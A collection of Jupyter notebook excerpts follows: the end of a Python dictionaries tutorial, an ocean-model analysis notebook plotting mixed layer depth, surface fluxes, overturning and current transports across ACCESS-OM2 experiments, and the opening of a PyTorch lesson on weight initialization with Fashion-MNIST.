# Method to return tuples of all items (we'll learn about tuples soon)
d.items()
```
Hopefully you now have a good basic understanding how to construct dictionaries. There's a lot more to go into here, but we will revisit dictionaries at later time. After this section all you need to know is how to create a dictionary and how to retrieve values from it.
| github_jupyter |
```
import cartopy.crs as ccrs
import cosima_cookbook as cc
import cartopy.feature as cfeature
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import cmocean as cm
from dask.distributed import Client
import matplotlib.path as mpath
import matplotlib.pyplot as plt
import numpy as np
import xarray as xr
# Avoid the Runtime errors in true_divide encountered when trying to divide by zero
import warnings
warnings.filterwarnings('ignore', category = RuntimeWarning)
warnings.filterwarnings('ignore', category = ResourceWarning)
warnings.filterwarnings('ignore', category = BytesWarning)
# matplotlib stuff:
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib
from mpl_toolkits.mplot3d import axes3d
%matplotlib inline
matplotlib.rcParams['mathtext.fontset'] = 'stix'
matplotlib.rcParams['font.family'] = 'STIXGeneral'
matplotlib.rcParams['lines.linewidth'] = 2.0
import logging
logger = logging.getLogger("distributed.utils_perf")
logger.setLevel(logging.ERROR)
from dask.distributed import Client
client = Client()
client
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_nostress.db'
session_cont = cc.database.create_session(db)
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_vary_rlds.db'
session_vary_rlds = cc.database.create_session(db)
db = '/scratch/x77/db6174/access-om2/archive/databases/1deg_jra55_ryf/cc_database_vary_rlds20_SAT3.75.db'
session_vary_rlds_SAT = cc.database.create_session(db)
expt = ['1deg_jra55_ryf_param_KPP', '1deg_jra55_ryf_nostress', '1deg_jra55_ryf_vary_rlds', '1deg_jra55_ryf_vary_rlds20_SAT3.75']
session = [session_cont, session_cont, session_vary_rlds, session_vary_rlds_SAT]
name = ['Control', 'Nostress', 'Vary rlds only', 'Vary rlds and SAT']
start_time = '1900-01-01'
end_time = '1900-12-31'
start_time_last = '1900-01-01'
end_time_last = end_time
ncoarse = 12
x_min = [-100, -250, -70, -250]
x_max = [ 10 , -100, 20, -80 ]
y_min = [ 20 , 20 , -80, -80 ]
y_max = [ 75 , 75 , -55, -55 ]
basin = ['NA', 'NP', 'SA', 'SP']
```
## KPP Depth
```
hblt = cc.querying.getvar(expt = expt[3], session = session_vary_rlds_SAT, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
hblt = cc.querying.getvar(expt = expt[i], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
finite_variable = xr.ufuncs.isfinite(hblt)
for k, l in enumerate(basin):
area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
area_t_basin = (finite_variable * area_t).mean('time')
hblt_basin = (hblt*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
#hblt_basin = hblt_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
hblt_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
del area_t
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title('KPP mixing layer - ' + basin[k])
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (20, 18))
start_time_hblt = start_time_last
end_time_hblt = end_time
for i, j in enumerate(session):
hblt = cc.querying.getvar(expt = expt[i], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
hblt.sel(time = slice(start_time_hblt, end_time_hblt)).mean('time').plot(ax = axes[int(i/2)][int(i%2)], vmin = 0, vmax = 100)
axes[int(i/2)][int(i%2)].set_title('KPP mixing layer - ' + name[i])
for i, j in enumerate([session_cont, session_vary_rlds]):
hblt_cont = cc.querying.getvar(expt = expt[0], session = session_cont, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
hblt = cc.querying.getvar(expt = expt[2*i + 1], session = j, variable = 'hblt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
((hblt_cont - hblt)/(hblt_cont)).sel(time = slice(start_time_hblt, end_time_hblt)).mean('time').plot(ax = axes[2][i], vmin = -1, vmax = 1, cmap = 'RdBu_r')
axes[1][0].set_title('KPP mixing layer fractional difference - control vs nostress')
axes[1][1].set_title('KPP mixing layer fractional difference - control vs vary-rlds')
```
## Surface temperature
```
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
temp_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'temp', frequency = '1 monthly').sel(time = slice(start_time, end_time))
temp_sfc = temp_sfc.isel(st_ocean = 1)
finite_variable = xr.ufuncs.isfinite(temp_sfc)
for k, l in enumerate(basin):
area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
area_t_basin = (finite_variable * area_t).mean('time')
temp_sfc_basin = (temp_sfc*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
temp_sfc_basin = temp_sfc_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
temp_sfc_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
del area_t
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title('Surface temperature - ' + basin[k])
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
temp_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'temp', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
temp_sfc = temp_sfc.isel(st_ocean = 1) - 273.15
finite_variable = xr.ufuncs.isfinite(temp_sfc)
temp_sfc.mean('time').plot.contourf(ax = axes[int(i/2)][int(i%2)], levels = np.linspace(-30, 30, 21))
```
## Surface salinity
```
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
salt_sfc = cc.querying.getvar(expt = expt[i], session = j, variable = 'salt', frequency = '1 monthly').sel(time = slice(start_time, end_time))
salt_sfc = salt_sfc.isel(st_ocean = 1)
finite_variable = xr.ufuncs.isfinite(salt_sfc)
for k, l in enumerate(basin):
area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
area_t_basin = (finite_variable * area_t).mean('time')
salt_sfc_basin = (salt_sfc*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
salt_sfc_basin = salt_sfc_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
salt_sfc_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
del area_t
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title('Surface salinity - ' + basin[k])
```
## Surface heat flux
```
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
hflux = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time, end_time))
finite_variable = xr.ufuncs.isfinite(hflux)
for k, l in enumerate(basin):
area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
area_t = area_t.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
area_t_basin = (finite_variable * area_t).mean('time')
hflux_basin = (hflux*area_t_basin).sum(dim = ['yt_ocean','xt_ocean'])/area_t_basin.sum(dim = ['yt_ocean','xt_ocean'])
hflux_basin = hflux_basin.coarsen({"time": ncoarse}, boundary = "trim").mean()
hflux_basin.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)],label = name[i])
del area_t
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title('Surface heat flux - ' + basin[k])
fig, axes = plt.subplots(nrows = 4, ncols = 4, figsize = (20, 18))
for i, j in enumerate(session):
sfc_heat = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(
start_time_last, end_time_last))
for k, l in enumerate(basin):
sfc_heat_basin = sfc_heat.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
sfc_heat_basin.mean('time').plot.contourf(ax = axes[k][i], levels = np.linspace(-100, 100, 21))
axes[k][i].set_title(str(basin[k]) + ' - ' + name[i] + ' Run')
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (20, 18))
for i, j in enumerate(session):
heat = cc.querying.getvar(expt = expt[i], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(
start_time_last, end_time_last))
heat.mean('time').plot(ax = axes[int(i/2)][int(i%2)], vmin = -80, vmax = 80, cmap = 'RdBu_r')
axes[int(i/2)][int(i%2)].set_title('Net surface heating - ' + name[i])
for i, j in enumerate([session_cont, session_vary_rlds]):
heat_cont = cc.querying.getvar(expt = expt[0], session = session[0], variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
heat_wfsh = cc.querying.getvar(expt = expt[2*i + 1], session = j, variable = 'net_sfc_heating', frequency = '1 monthly').sel(time = slice(start_time_last, end_time_last))
(heat_cont - heat_wfsh).mean('time').plot(ax = axes[2][i], vmin = -80, vmax = 80, cmap = 'RdBu_r')
axes[2][0].set_title('Net surface heating difference (control - nostress)')
axes[2][1].set_title('Net surface heating difference (control - vary_rlds)')
```
## Heat flux : Individual contributions
```
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
var_list = ['swflx', 'lw_heat', 'evap_heat', 'sens_heat']
var_name = ['Shortwave', 'Longwave', 'Latent heat', 'Sensible heat']
for i, j in enumerate(session):
area_t = cc.querying.getvar(expt = expt[i], variable = 'area_t', session = j, frequency = 'static', n = 1)
for k, l in enumerate(var_list):
variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time, end_time))
variable = (variable * area_t).sum(dim = ['yt_ocean','xt_ocean'])/area_t.sum(dim = ['yt_ocean','xt_ocean'])
#variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
variable.sel(time = slice(start_time, end_time)).plot(ax = axes[int(k/2)][int(k%2)], label = name[i])
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title(var_name[k])
plt.figure(figsize = (20, 5))
start_time_heat = '1900-01-01'
end_time_heat = end_time
for i, j in enumerate(session):
sum_var = 0
dxt = cc.querying.getvar(expt = expt[i], variable = 'dxt', session = j, frequency = 'static', n = 1)
for k, l in enumerate(var_list):
variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time_heat, end_time_heat))
variable = (variable * dxt).sum(dim = ['xt_ocean'])
# variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
sum_var = sum_var + variable
sum_var.sel(time = slice(start_time_heat, end_time_heat)).mean('time').plot(label = name[i])
plt.legend()
plt.title('Surface heat flux comparison - Zonally averaged')
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
for i, j in enumerate(session):
dxt = cc.querying.getvar(expt = expt[i], variable = 'dxt', session = j, frequency = 'static', n = 1)
for k, l in enumerate(var_list):
variable = cc.querying.getvar(expt = expt[i], session = j, variable = l, frequency = '1 monthly').sel(time = slice(start_time, end_time))
variable = (variable * dxt).sum(dim = ['xt_ocean'])
# variable = variable.coarsen({"time": ncoarse}, boundary = "trim").mean()
variable.sel(time = slice(start_time, end_time)).mean('time').plot(ax = axes[int(k/2)][int(k%2)], label = name[i])
axes[int(k/2)][int(k%2)].legend()
axes[int(k/2)][int(k%2)].set_title(var_name[k])
```
## Stratification
```
potrho_2_con = cc.querying.getvar(expt[0], 'pot_rho_2',session = session[0], start_time = '1995-01-01',
end_time = end_time) - 1000#.sel(xt_ocean = slice(x_min,x_max)).sel(yt_ocean = slice(y_min,y_max)) - 1000
potrho_2_buo = cc.querying.getvar(expt[1], 'pot_rho_2',session = session[1], start_time = '1995-01-01',
end_time = end_time) - 1000#.sel(xt_ocean = slice(x_min,x_max)).sel(yt_ocean = slice(y_min,y_max)) - 1000
plt.figure(figsize = (12, 6))
ticks = [33, 34, 35, 35.5, 36, 36.4, 36.7, 37]
test_1 = potrho_2_con.mean('time').sel(xt_ocean = slice(-60, -30)).mean('xt_ocean').plot.contour(levels = ticks)
plt.gca().invert_yaxis()
plt.clabel(test_1, inline = True,fontsize = 10)
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
ticks = [32, 34, 35, 35.5, 36, 36.4, 36.7, 36.9, 37]
for i, j in enumerate(session):
potrho = cc.querying.getvar(expt[i], 'pot_rho_2',session = j, start_time = '1995-01-01', end_time = end_time) - 1000
mean_pot = potrho.mean('time').sel(xt_ocean = slice(-60, -30)).mean('xt_ocean')
p1 = ax[int(i/2)][int(i%2)].contourf(potrho.yt_ocean, potrho.st_ocean, mean_pot, cmap = cm.cm.curl, levels = ticks, extend = 'both')
ax[int(i/2)][int(i%2)].invert_yaxis()
cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
cb.ax.set_xlabel('Sv')
ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = ticks, colors = 'k', linewidths = 0.25)
ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = [0.0,], colors = 'k', linewidths = 0.5)
plt.clabel(p1, inline = True, fontsize = 10)
ax[int(i/2)][int(i%2)].set_title('Stratification (averaged over last 5 years) for ' + name[i])
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 12))
ticks = [32, 34, 35, 35.5, 36, 36.4, 36.7, 36.9, 37]
for i, j in enumerate(session):
potrho = cc.querying.getvar(expt[i], 'pot_rho_2',session = j, start_time = '1995-01-01', end_time = end_time) - 1000
mean_pot = potrho.mean('time').sel(xt_ocean = slice(-160, -130)).mean('xt_ocean')
p1 = ax[int(i/2)][int(i%2)].contourf(potrho.yt_ocean, potrho.st_ocean, mean_pot, cmap = cm.cm.curl, levels = ticks, extend = 'both')
ax[int(i/2)][int(i%2)].invert_yaxis()
cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
cb.ax.set_xlabel('Sv')
ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = ticks, colors = 'k', linewidths = 0.25)
ax[int(i/2)][int(i%2)].contour(potrho.yt_ocean, potrho.st_ocean, mean_pot, levels = [0.0,], colors = 'k', linewidths = 0.5)
plt.clabel(p1, inline = True, fontsize = 10)
ax[int(i/2)][int(i%2)].set_title('Stratification (averaged over last 5 years) for ' + name[i])
```
## Gyres
```
rho0 = 1025
start_time_gyre = '1980-01-01'
end_time_gyre = '1999-12-31'
fig, axes = plt.subplots(nrows = 4, ncols = 4, figsize = (24, 20))
for i, j in enumerate(session):
tx_trans = cc.querying.getvar(expt = expt[i], session = j, variable = 'tx_trans_int_z', frequency = '1 monthly').sel(time = slice(start_time_gyre, end_time_gyre))
ty_trans = cc.querying.getvar(expt = expt[i], session = j, variable = 'ty_trans_int_z', frequency = '1 monthly').sel(time = slice(start_time_gyre, end_time_gyre))
for k, l in enumerate(basin):
if(l == 'NA' or l == 'NP'):
ty_basin = ty_trans.sel(xt_ocean = slice(x_min[k], x_max[k])).sel(yu_ocean = slice(y_min[k], y_max[k]))
psi_basin = ty_basin.cumsum('xt_ocean').where(abs(ty_basin<=1.e20))/(rho0*1.e6)
else:
tx_basin = tx_trans.sel(xu_ocean = slice(x_min[k], x_max[k])).sel(yt_ocean = slice(y_min[k], y_max[k]))
psi_basin = tx_basin.cumsum('yt_ocean').where(abs(tx_basin<=1.e20))/(rho0*1.e6)
psi_basin.sel(time = slice(start_time, end_time)).mean('time').plot.contourf(ax = axes[k][i], levels = np.linspace(-30, 30, 21))
axes[k][i].set_title(str(basin[k]) + ' - ' + name[i] + ' Run')
```
## Overturning circulation
```
fig, ax = plt.subplots(nrows = 2, ncols = 2, figsize = (20, 10))
#clev = np.arange(-25, 27, 2)
clev = np.linspace(-25, 25, 21)
yticks = np.array([1030, 1032, 1033, 1034, 1035, 1036,1036.5, 1037])
scfac = 4 ## A power to set teh stretching
start_time_OC = '1999-01-01'
end_time_OC = '1999-12-31'
rho = 1025 # mean density of sea-water in kg/m^3
for i, j in enumerate(session):
psiGM = cc.querying.getvar(expt[i], 'ty_trans_rho_gm', session = j, start_time = start_time_OC, end_time = end_time_OC)
psiGM = psiGM.sum('grid_xt_ocean')
psiGM = psiGM / (1e6*rho)
psi = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = start_time_OC, end_time = end_time_OC)
psi = psi.sum('grid_xt_ocean').sel(time = slice(start_time_OC, end_time_OC))
psi = psi / (1e6*rho) # converts kg/s to Sv
psi_avg = psi.cumsum('potrho').mean('time') #- psi.sum('potrho').mean('time')
psi_avg = psi_avg + psiGM.mean('time')
p1 = ax[int(i/2)][int(i%2)].contourf(psi_avg.grid_yu_ocean,(psi_avg.potrho-1028)**scfac, psi_avg, cmap=cm.cm.curl, levels = clev, extend = 'both')
cb = plt.colorbar(p1, orientation = 'vertical', ax = ax[int(i/2)][int(i%2)])
cb.ax.set_xlabel('Sv')
ax[int(i/2)][int(i%2)].contour(psi_avg.grid_yu_ocean,(psi_avg.potrho - 1028)**scfac, psi_avg, levels = clev, colors = 'k', linewidths = 0.25)
ax[int(i/2)][int(i%2)].contour(psi_avg.grid_yu_ocean,(psi_avg.potrho - 1028)**scfac, psi_avg, levels = [0.0,], colors = 'k', linewidths = 0.5)
ax[int(i/2)][int(i%2)].set_yticks((yticks-1028)**scfac)
ax[int(i/2)][int(i%2)].set_yticklabels(yticks)
ax[int(i/2)][int(i%2)].set_ylim([0.5**scfac, 9.2**scfac])
ax[int(i/2)][int(i%2)].invert_yaxis()
ax[int(i/2)][int(i%2)].set_ylabel('Potential Density (kg m$^{-3}$)')
ax[int(i/2)][int(i%2)].set_xlabel('Latitude ($^\circ$N)')
ax[int(i/2)][int(i%2)].set_xlim([-75,80])
ax[int(i/2)][int(i%2)].set_title('Overturning for ' + str(name[i]) + ' Run for year 1999');
```
### Sector overturning
```
def compute_basin_psi_rho(expt,session, basin_mask, nbound=None, start_time = start_time_OC, end_time = end_time_OC):
rho = 1025 # mean density of sea-water in kg/m^3
varlist = cc.querying.get_variables(session, expt)
if varlist['name'].str.contains('ty_trans_rho_gm').any():
GM = True
print('GM is True')
psiGM = cc.querying.getvar(expt,'ty_trans_rho_gm',session, n=nbound,start_time = start_time_OC, end_time = end_time)
psiGM = psiGM.sum('grid_xt_ocean')
psiGM = psiGM / (1e6*rho)
else:
GM = False
print('GM is False')
psi = cc.querying.getvar(expt, 'ty_trans_rho',session, n=nbound,start_time = start_time, end_time = end_time)
psi = psi / (1e6*rho) # converts kg/s to Sv
psi = (psi * basin_mask).sum('grid_xt_ocean').cumsum('potrho').mean(dim = 'time').load()
if GM:
psi = psi + psiGM.mean('time')
return psi
#clev=np.arange(-25,25,2)
clev = np.linspace(-25, 25, 21)
yticks = np.array([1030, 1032, 1033, 1034, 1035, 1036,1036.5, 1037])
scfac = 4 ## A power to set the stretching of the y-axis
fig, axes = plt.subplots(nrows = 4, ncols = 2, figsize = (20, 24))
for i, j in enumerate(session):
psi = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = start_time_OC, end_time = end_time_OC)
ht = cc.querying.getvar(expt[i], 'ht', session = j, n = -1)
land_mask = ~ht.isnull()
south_map = (land_mask.where(land_mask.yt_ocean < -34)).fillna(0)
indo_map1 = (land_mask.where(land_mask.yt_ocean < 9).where(land_mask.yt_ocean > -34).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-65)).fillna(0)
indo_map2 = (land_mask.where(land_mask.yt_ocean < 15).where(land_mask.yt_ocean > 9).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-83.7)).fillna(0)
indo_map3 = (land_mask.where(land_mask.yt_ocean < 17).where(land_mask.yt_ocean > 15).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-93.3)).fillna(0)
indo_map4 = (land_mask.where(land_mask.yt_ocean < 85).where(land_mask.yt_ocean > 17).where(land_mask.xt_ocean >-280).where(land_mask.xt_ocean<-99)).fillna(0)
indo_map5 = (land_mask.where(land_mask.yt_ocean < 30.5).where(land_mask.yt_ocean > -34).where(land_mask.xt_ocean >25).where(land_mask.xt_ocean<80)).fillna(0)
indo_sector_map = indo_map1 + indo_map2 + indo_map3 + indo_map4 + indo_map5 + south_map
indo_sector_mask = indo_sector_map.where(indo_sector_map>0)
atlantic_sector_map = (indo_sector_mask * 0).fillna(1) * land_mask
atlantic_sector_map = atlantic_sector_map + south_map
atlantic_sector_mask = atlantic_sector_map.where(atlantic_sector_map>0)
indo_sector_mask.coords['xt_ocean'] = psi.grid_xt_ocean.values
indo_sector_mask.coords['yt_ocean'] = psi.grid_yu_ocean.values
indo_sector_mask = indo_sector_mask.rename({'xt_ocean':'grid_xt_ocean','yt_ocean':'grid_yu_ocean'})
atlantic_sector_mask.coords['xt_ocean'] = psi.grid_xt_ocean.values
atlantic_sector_mask.coords['yt_ocean'] = psi.grid_yu_ocean.values
atlantic_sector_mask = atlantic_sector_mask.rename({'xt_ocean':'grid_xt_ocean','yt_ocean':'grid_yu_ocean'})
atlantic_psi = compute_basin_psi_rho(expt[i], j, atlantic_sector_mask, start_time = start_time_OC, end_time = end_time)
indopacific_psi = compute_basin_psi_rho(expt[i], j, indo_sector_mask, start_time = start_time_OC, end_time = end_time)
p1 = axes[i][0].contourf(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, cmap=cm.cm.curl, levels=clev, extend='both')
axes[i][0].contour(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, levels=clev, colors='k', linewidths=0.25)
axes[i][0].contour(atlantic_psi.grid_yu_ocean,(atlantic_psi.potrho-1028)**scfac, atlantic_psi, levels=[0.0,], colors='k', linewidths=0.75)
axes[i][0].set_yticks((yticks-1028)**scfac)
axes[i][0].set_yticklabels(yticks)
axes[i][0].set_ylim([0.5**scfac, 9.2**scfac])
axes[i][0].invert_yaxis()
axes[i][0].set_ylabel('Potential Density (kg m$^{-3}$)')
axes[i][0].set_xlabel('Latitude ($^\circ$N)')
axes[i][0].set_xlim([-75,80])
axes[i][0].set_title('Atlantic Sector Overturning - ' + name[i] + ' run');
## Plotting Indo-Pacific Sector
p1 = axes[i][1].contourf(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, cmap=cm.cm.curl, levels=clev, extend='both')
axes[i][1].contour(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, levels=clev, colors='k', linewidths=0.25)
axes[i][1].contour(indopacific_psi.grid_yu_ocean,(indopacific_psi.potrho-1028)**scfac, indopacific_psi, levels=[0.0,], colors='k', linewidths=0.75)
axes[i][1].set_yticks((yticks-1028)**scfac)
axes[i][1].set_yticklabels(yticks)
axes[i][1].set_ylim([0.5**scfac, 9.2**scfac])
axes[i][1].invert_yaxis()
axes[i][1].set_xlabel('Latitude ($^\circ$N)')
axes[i][1].set_xlim([-75,65])
axes[i][1].set_title('Indo-Pacific Sector Overturning - ' + name[i] + ' run');
# Plot a colorbar
cax = plt.axes([0.92, 0.25, 0.01, 0.5])
cb = plt.colorbar(p1, cax = cax,orientation = 'vertical', ax = axes[i])
cb.ax.set_xlabel('Sv')
```
## Global diagnostics
```
ncoarse = 12
fig, axes = plt.subplots(nrows = 4, figsize = (20, 20))
var_list = ['temp_global_ave', 'salt_global_ave', 'temp_surface_ave', 'salt_surface_ave']
var_name = ['Global temperature', 'Global salinity', 'Surface temperature', 'Surface salinity']
for i, j in enumerate(expt):
for k, l in enumerate(var_list):
variable = cc.querying.getvar(expt = expt[i], session = session[i], variable = l).sel(time = slice('1900-01-01', end_time))
variable = variable.coarsen({"time": ncoarse*30}, boundary = "trim").mean()
variable.plot(ax = axes[k], label = name[i])
axes[k].legend()
axes[k].set_title(var_name[k])
fig, axes = plt.subplots(nrows = 2, figsize = (20, 12))
var_list = ['ke_tot', 'pe_tot' ]
var_name = ['Kinetic energy', 'Potential energy']
for i, j in enumerate(expt):
for k, l in enumerate(var_list):
variable = cc.querying.getvar(expt = expt[i], session = session[i], variable = l).sel(time = slice('1900-01-01', end_time))
variable = variable.coarsen({"time": ncoarse*30}, boundary = "trim").mean()
variable.plot(ax = axes[k], label = name[i])
axes[k].legend()
axes[k].set_title(var_name[k])
```
## Circulation metrics
### ACC Transport
```
xmin = -69.9
ymin = -71.6
ymax = -51.0
rho0 = 1036
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
DP_trans = cc.querying.getvar(expt[i], 'tx_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
xu_ocean = xmin, method='nearest').sel(yt_ocean = slice(ymin, ymax)).sum('yt_ocean')/rho0/1e6
DP_trans = DP_trans.coarsen({"time": ncoarse}, boundary = "trim").mean()
DP_trans.plot(label = name[i])
plt.legend()
plt.title('Drake Passage Transport')
```
### AABW Circulation
```
latitude = -45
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
psi_aabw = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = '1900-01-01', end_time = end_time).sum(
'grid_xt_ocean').sel(method = 'nearest', grid_yu_ocean = latitude)*1.0e-9
psi_aabw_sum = psi_aabw.cumsum('potrho') - psi_aabw.sum('potrho')
psi_aabw_sum = -psi_aabw_sum.sel(potrho = slice(1036.2, None)).min('potrho').resample(time = 'Y').mean()
psi_aabw_sum.plot(label = name[i])
plt.legend()
plt.title('AABW Circulation')
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
psi_amoc = cc.querying.getvar(expt[i], 'ty_trans_rho', session = j, start_time = '1900-01-01', end_time = end_time).sel(
grid_xt_ocean = slice(-103, -5)).sum('grid_xt_ocean').sel(method = 'Nearest', grid_yu_ocean = 26)*1.0e-9
psi_amoc_sum = psi_amoc.cumsum('potrho') - psi_amoc.sum('potrho')
psi_amoc_sum = psi_amoc_sum.sel(potrho = slice(1035.5, None)).max('potrho').resample(time = 'Y').mean()
psi_amoc_sum.plot(label = name[i])
plt.legend()
plt.title('AMOC cell')
```
### Gulf stream transport
```
xmin = -85
xmax = -75
ymin = 30
rho = 1030
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
GS = cc.querying.getvar(expt[i], 'ty_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
xt_ocean = slice(xmin, xmax)).sel(yu_ocean = ymin, method = 'nearest').sum('xt_ocean')/rho0/1e6
GS = GS.coarsen({"time": ncoarse}, boundary = "trim").mean()
GS.plot(label = name[i])
plt.legend()
plt.title('Gulf stream WBC')
```
### Kuroshio current
```
xmin = -250
xmax = -210
ymin = 30
rho = 1030
plt.figure(figsize = (20,5))
for i, j in enumerate(session):
KC = cc.querying.getvar(expt[i], 'ty_trans_int_z', session = j, start_time = '1900-01-01', end_time = end_time).sel(
xt_ocean = slice(xmin, xmax)).sel(yu_ocean = ymin, method = 'nearest').sum('xt_ocean')/rho0/1e6
KC = KC.coarsen({"time": ncoarse}, boundary = "trim").mean()
KC.plot(label = name[i])
plt.legend()
plt.title('Kuroshio current WBC')
```
| github_jupyter |
# Weight Initialization
In this lesson, you'll learn how to find good initial weights for a neural network. Weight initialization happens once, when a model is created and before it trains. Having good initial weights can place the neural network close to the optimal solution. This allows the neural network to come to the best solution quicker.
<img src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/neuron_weights.png" width=40%/>
## Initial Weights and Observing Training Loss
To see how different weights perform, we'll test on the same dataset and neural network. That way, we know that any changes in model behavior are due to the weights and not any changing data or model structure.
> We'll instantiate at least two of the same models, with _different_ initial weights and see how the training loss decreases over time, such as in the example below.
<img src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/loss_comparison_ex.png" width=60%/>
Sometimes the differences in training loss, over time, will be large and other times, certain weights offer only small improvements.
### Dataset and Model
We'll train an MLP to classify images from the [Fashion-MNIST database](https://github.com/zalandoresearch/fashion-mnist) to demonstrate the effect of different initial weights. As a reminder, the FashionMNIST dataset contains images of clothing types; `classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']`. The images are normalized so that their pixel values are in a range [0.0 - 1.0). Run the cell below to download and load the dataset.
---
#### EXERCISE
[Link to normalized distribution, exercise code](#normalex)
---
### Import Libraries and Load [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)
```
import sys
try:
import torch
except:
import os
os.environ['TCMALLOC_LARGE_ALLOC_REPORT_THRESHOLD']='2000000000'
# http://pytorch.org/
from os.path import exists
